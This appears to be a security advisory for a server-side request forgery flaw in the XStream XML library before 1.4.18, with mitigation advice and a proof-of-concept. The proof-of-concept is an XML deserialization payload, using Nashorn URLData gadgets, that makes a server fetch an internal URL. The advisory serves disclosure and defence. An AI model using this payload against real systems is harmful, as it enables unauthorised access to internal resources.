Server-Side Request Forgery (SSRF) Affecting com.thoughtworks.xstream:xstream Open this link in a new tab package, versions [,1.4.18)

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). This vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.

PoC

<map>
  <entry>
    <jdk.nashorn.internal.runtime.Source_-URLData>
      <url>http://localhost:8080/internal/</url>
      <cs>GBK</cs>
      <hash>1111</hash>
      <array>b</array>
      <length>0</length>
      <lastModified>0</lastModified>
    </jdk.nashorn.internal.runtime.Source_-URLData>
    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
  </entry>
  <entry>
    <jdk.nashorn.internal.runtime.Source_-URLData>
      <url>http://localhost:8080/internal/</url>
      <cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>
      <hash>1111</hash>
      <array>b</array>
      <length>0</length>
      <lastModified>0</lastModified>
    </jdk.nashorn.internal.runtime.Source_-URLData>
    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
  </entry>
</map>

XStream xstream = new XStream();
xstream.fromXML(xml);

• XStream Advisory
• XStream Changelog